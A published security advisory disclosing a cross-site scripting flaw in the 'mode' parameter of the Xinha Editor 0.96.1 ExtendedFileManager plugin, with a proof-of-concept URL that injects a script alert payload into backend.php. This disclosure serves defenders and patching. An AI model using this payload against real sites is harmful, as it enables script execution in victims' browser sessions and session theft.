[MajorSecurity SA-077]XINHA Editor Plugin "ExtendedFileManager" - Cross
Site Scripting Issue

Details
=============
Product: XINHA Editor Plugin "ExtendedFileManager"
Security-Risk: low
Remote-Exploit: yes
Vendor-URL: http://www.xinha.org/
Advisory-Status: published

Credits
=============
Discovered by: David Vieira-Kurz of MajorSecurity

Original Advisory
=============
http://www.majorsecurity.net/xinha-editor-xss.php

Affected Products:
=============
XINHA Editor 0.96.1 Plugin "ExtendedFileManager"
Prior versions may also be vulnerable

Description
=============
"Xinha (pronounced like Xena, the Warrior Princess) is a powerful
WYSIWYG HTML editor component that works in all current browsers." -
from xinha.org

More Details
=============
We at MajorSecurity have discovered some vulnerabilities in one of the
Plugins in XINHA WYSIWYG Editor version 0.96.1, which can be exploited
by malicious people to conduct cross-site scripting attacks. Input
passed directly to the "mode" parameter in "backend.php" of the
"ExtendedFileManager" Plugin is not properly sanitised before being
stored and returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context of
an affected site.

Proof of concept
=============
http://localhost/xinha-0.96.1/plugins/ExtendedFileManager/backend.php?__plugin=ExtendedFileManager&__function=manager&backend_data[data]=a%3A9%3A{s%3A17%3A%22max_foldersize_mb%22%3Bi%3A10%3Bs%3A9%3A%22files_dir%22%3Bs%3A38%3A%22%2Fwww%2Fhtdocs%2Fw007ec76%2Fx_examples%2Fimages%22%3Bs%3A10%3A%22images_dir%22%3Bs%3A38%3A%22%2Fwww%2Fhtdocs%2Fw007ec76%2Fx_examples%2Fimages%22%3Bs%3A9%3A%22files_url%22%3Bs%3A19%3A%22%2Fx_examples%2Fimages%2F%22%3Bs%3A10%3A%22images_url%22%3Bs%3A19%3A%22%2Fx_examples%2Fimages%2F%22%3Bs%3A21%3A%22images_enable_styling%22%3Bb%3A0%3Bs%3A21%3A%22max_filesize_kb_image%22%3Bi%3A200%3Bs%3A20%3A%22max_filesize_kb_link%22%3Bs%3A3%3A%22max%22%3Bs%3A23%3A%22allowed_link_extensions%22%3Ba%3A12%3A{i%3A0%3Bs%3A3%3A%22jpg%22%3Bi%3A1%3Bs%3A3%3A%22gif%22%3Bi%3A2%3Bs%3A2%3A%22js%22%3Bi%3A3%3Bs%3A3%3A%22pdf%22%3Bi%3A4%3Bs%3A3%3A%22zip%22%3Bi%3A5%3Bs%3A3%3A%22txt%22%3Bi%3A6%3Bs%3A3%3A%22psd%22%3Bi%3A7%3Bs%3A3%3A%22png%22%3Bi%3A8%3Bs%3A4%3A%22html%22%3Bi%3A9%3Bs%3A3%3A

%22swf%22%3Bi%3A10%3Bs%3A3%3A%22xml%22%3Bi%3A11%3Bs%3A3%3A%22xls%22%3B}}&backend_data[session_name]=PHPSESSID&backend_data[key_location]=Xinha%3ABackendKey&backend_data[hash]=582686c520f11fc779ada11642d7e3b5711a3c37&PHPSESSID=599be382ae27a9a75cd2e7d039b2098a&mode="<script>alert(/XSS/)</script>

Solution
=============
Web applications should never trust on user generated input and
therefore sanatize all input. Edit the source code to ensure that input
is properly sanitised.